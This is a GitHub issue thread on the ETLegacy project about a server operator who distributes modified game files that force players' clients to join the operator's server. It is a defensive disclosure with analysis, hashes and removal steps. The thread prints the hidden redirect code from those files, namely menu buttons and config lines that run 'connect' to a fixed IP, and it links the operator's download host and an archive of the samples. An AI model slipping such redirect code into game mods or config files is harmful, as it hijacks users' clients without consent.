### ISSUE TITLE
Server abuse

### ISSUE THREAD

**Issue by grepwood** [etlegacy/etlegacy#2209]
OP of this video https://www.youtube.com/watch?v=TVtZd9UxTN0 explains how one sysop is playing dirty with the master server and the community at large.
- they have multiple listen ports on the same IP that redirect clients to one and the same instance of ETLegacy server
- they spread malware as a downloadable plugin that redirects the ETLegacy client to their server when the client is trying to join any other server
- their server is constantly filled with bots to fake being an attractive, lively server

**Comment by kajto3** [comment]
How exactly is that ET Legacy issue? Legacy is protected against redirection hack. They are using Nitmod. Don't think there's much ETL devs can do to help people playing there, even though the bad server is running on etlded. TrackBase has already disabled their main server. Most server regulars will know something is up... I think so at least.

**Comment by Aciz** [comment]
The most we can do (and are planning to do) is to ban their IP address(es) from the ETL master server and implement ban list fetching for client, so ETL clients will not display the servers by default. But that's the extent of what we can do about it, we can't stop them from running such servers ofc.

**Comment by ensiform** [comment]
And once you do that they will just start changing IPs

**Comment by Aciz** [comment]
> And once you do that they will just start changing IPs

Yes they can do that, but at least it's a hassle for them since they need to request a new IP from their server provider.

**Comment by mittermichal** [comment]
maybe automatically ban redirect servers?
or is that not simple to detect?

**Comment by grepwood** [comment]
@mittermichal perhaps. I'm not an admin of anything in ETLegacy's world, I think it's up to the decidents to decide what to do.

What about the malware they're using to build their underhanded monopoly?

**Comment by mittermichal** [comment]
that malware you are referring to doesn't work in ET:L, does it?

**Comment by grepwood** [comment]
I have separated the files downloaded from the server and dumped the log. I will proceed investigating.

**Comment by grepwood** [comment]
Right. I had a draft of this written here, but I have done a very extensive assessment.

The malware is hidden in:
1. File:
```
etmain/``.pk3
```
I'd like to take a moment to say "go to hell" to the perpetrator of this because I had to write triple markdown code quotemarks to make this filename appear.
The malware appears in file:line:
```
ui/main.menu:173:       BUTTON( 6, 32, WINDOW_WIDTH-12, 18, "^7RANDOM ^SSERVER", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:174:       BUTTON( 6, 56, WINDOW_WIDTH-12, 18, "PLAY ONLINE", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:175:       BUTTON( 6, 80, WINDOW_WIDTH-12, 18, "HOST GAME", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:176:       BUTTON( 6, 104, WINDOW_WIDTH-12, 18, "REPLAYS", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:177:       BUTTON( 6, 128, WINDOW_WIDTH-12, 18, "OPTIONS", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:178:       BUTTON( 6, 152, WINDOW_WIDTH-12, 18, "PROFILE", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:179:       BUTTON( 6, 176, WINDOW_WIDTH-12, 18, "CREDITS", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:180:       BUTTON( 6, 200, WINDOW_WIDTH-12, 18, "EXIT GAME", .3, 14, close main ; exec "seta com_hunkmegs 512" ; exec "seta com_zoneMegs 64" ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
```

2. File `nitmod/^7zz_^7[^rONE^VFILE^7]^y.pk3` in file:line:
```
ui/main.menu:135:       BUTTON( 6, 32, WINDOW_WIDTH-12, 18, "^7P^qLAY ^7O^qNLINE", .3, 14, close main ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:136:       BUTTON( 6, 56, WINDOW_WIDTH-12, 18, "^7H^qOST ^7G^qAME", .3, 14, close main ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
ui/main.menu:141:       BUTTON( 6, 176, WINDOW_WIDTH-12, 18, "^7Q^qUIT", .3, 14, close main ; exec "set strHTAction connect 46.29.21.219:27315"; exec "vstr strHTAction" )
autoexec_spectator.cfg:27:echo "^7Zapisz ^qIP! ^s46.29.21.219:27315
autoexec_axis.cfg:27:echo "^7Zapisz ^qIP! ^s46.29.21.219:27315
autoexec_allies.cfg:28:echo "^7Zapisz ^qIP! ^s46.29.21.219:27315
```

3. File `nitmod/^7zz_^7[^rSEC^VFILE^7]^vII^y.pk3` in file:line:
```
server_nodownload.cfg:1:say ^7I'm connecting to: ^y[^7P^QS^7X^y] ^7Polski ^qSerwer ^7Xp^qSave(^r46.29.21.219:27315^s) ; wait 350 ; connect 46.29.21.219:27315
```

4. File `nitmod/__.pk3` in file:line:
```
server_nodownload.cfg:1:say ^7I'm connecting to: ^y[^7P^QS^7X^y] ^7Polski ^qSerwer ^7Xp^qSave(^r46.29.21.219:27315^s) ; wait 350 ; connect 46.29.21.219:27315
```

Here's a table that lists them by sha256, size in bytes, and filename:
```
etmain/``.pk3 459958 212c54993e2021b97a751d6205f2e11455c64581312f7112ac86a0ec9759fefa
nitmod/^7zz_^7[^rONE^VFILE^7]^y.pk3 9202820 4a69d38e762f110e7b969272408c05781f5d10e9b3020cbb933db8615108d3f3
nitmod/^7zz_^7[^rSEC^VFILE^7]^vII^y.pk3 8231 ede42e0bcdc5da13d74ba320f06fc0d483cf018441765142523060cda9b52066
nitmod/__.pk3 866262 2d1c0b7c166219c42d0387c84645a75c8dc3c119ae756985e7cb7ef4a115f6e4
```

Remedy:
On Windows if you were using WolfET, delete files:
```
%APPDATA%\..\Local\VirtualStore\Program Files (x86)\Wolfenstein - Enemy Territory\etmain\``.pk3
%APPDATA%\..\Local\VirtualStore\Program Files (x86)\Wolfenstein - Enemy Territory\nitmod\^7zz_^7[^rONE^VFILE^7]^y.pk3
%APPDATA%\..\Local\VirtualStore\Program Files (x86)\Wolfenstein - Enemy Territory\nitmod\^7zz_^7[^rSEC^VFILE^7]^vII^y.pk3
%APPDATA%\..\Local\VirtualStore\Program Files (x86)\Wolfenstein - Enemy Territory\nitmod\__.pk3
```
On Windows if you are using ETLegacy, I don't know where these files are downloaded to because I only ever played ETLegacy on Linux, and that was back in 2013.

For review, all the files downloaded from their host (`http://807459.node76.pukawka.pl/etmain`, `http://807459.node76.pukawka.pl/nitmod`) can be found mirrored here just in case they decide to delete the evidence https://archive.org/download/20221214_20221214_2104

That's just my opinion, but I think ETLegacy should not allow to modify its menu with this much liberty. Do you actually see what they have done? They are modifying the menu to always connect to their servers!

**Comment by rafal1137** [comment]
> That's just my opinion, but I think ETLegacy should not allow to modify its menu with this much liberty. Do you actually see what they have done? They are modifying the menu to always connect to their servers!

@grepwood 
Thats already implemented in legacy mod/client but other mods it is another story they do download everything in one place.

Here is how it works:
Every map and legacy versions are downloaded in seperated directories called `dlcache` you can find them in:
Windows:
`Documents/ETLegacy/etmain/dlcache`
`Documents/ETLegacy/legacy/dlcache`
Linux:
`~/.etlegacy/etmain/dlcache`
`~/.etlegacy/legacy/dlcache`

Those directories are not available at startup of the game so there is nothing to worry about main menu being modded.
Unless you have no idea what file is safe those files should stay there otherwise you can copy them over to where they should be
